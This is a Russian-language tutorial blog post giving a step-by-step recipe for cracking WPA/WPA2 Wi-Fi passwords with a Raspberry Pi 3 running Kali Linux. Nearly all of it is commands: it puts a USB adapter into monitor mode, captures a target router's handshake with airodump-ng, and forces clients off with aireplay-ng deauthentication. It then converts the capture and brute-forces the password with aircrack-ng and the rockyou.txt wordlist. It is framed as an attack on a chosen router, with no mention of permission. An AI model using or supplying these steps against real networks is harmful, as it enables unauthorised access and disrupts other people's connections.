Взлом Wifi с помощью Raspberry Pi 3

В статье обозначу основные аспекты по взлому wifi с использованием:
— Raspberry Pi 3 с предустановленной ОС Kali Linux (в моес случаем Linux kali 4.19.81-Re4son-v7+ #1 SMP Wed Nov 6 10:16:47 AEDT 2019 armv7l GNU/Linux)
— usb wifi адаптера

Очередность взлома:
1. Получить файл handshake (рукопожатия)
2. На основе рукопожатия и словаря паролей rockyou.txt выполнить бутфорс (метод последовательного перебора паролей) паролей.

Step-by-step

Устанавливаем usb адаптер в Raspberry, в дальнейшем его будем использовать в режиме монитора.

Устанавливаем aircrack-ng

sudo apt-get install aircrack-ng

Запускаем службу монитора airmon-ng

airmon-ng

Запускаем монитор с сети usb адаптера

airmon-ng start wlan1

включаем режим монитора

iwconfig

Возможно понадобиться убить процессы держащие интерфейс

airmon-ng check kill

После повторной команды iwconfig появится интерфейс монитора «wlan1mon»

Сканируем доступные сети wifi

airodump-ng wlan1mon

Выбираем роутер для атаки (с WPA или WPA2)

Выписываем MAC адрес и канал СH

Image titled 6560850 23

Запускаем монитор выбранного роутера  для получения рукопожатия

airodump-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/

Где -с — номер канала, —bssid — MAC роутера, -w директория для сохрания .cap файла с пойманным рукопожатием

Рукопожатие будет отслеженно как только клиент подключиться к сети Wifi, тогда в верхнем правом углу появится  WPA(2) handshake: MAC

Image titled 6560850 25

Если нет времени ждать подключения клиента, можно воспользоваться методом деаутенфикации, когда пользователю нужно принудительно повторно авторизоваться на роутере:

 

aireplay-ng -0 3 -a MAC1 -c MAC2 wlan1mon

, где MAC1 — mac атакуемого роутера, MAC2 — mac атакуеого клиента, для повторной авторизации.

Переименовываем созданные файл с рукопожатием

mv ./-01.cap name.cap

Для подбора паролей с помощью naive-hashcat необходимо сконвертировать .cap в .xccpax:

git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils/src/
make
sudo mv *.bin /usr/local/bin/
sudo cp -a *.pl /usr/local/bin/
cap2hccapx.bin name.cap name.hccapx

Скачиваем словарь паролей rockyou.txt

curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Запускаем процедуру подбора пароля на wifi:

aircrack-ng -a2 -b MAC -w rockyou.txt name.cap

где -a2 — WPA2, (a1-WPA),

-b MAC — макадрес роутера

-w rockyou.txt словарь паролей

name.cap — перехваченное рукопожатие

 

Источник: https://www.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux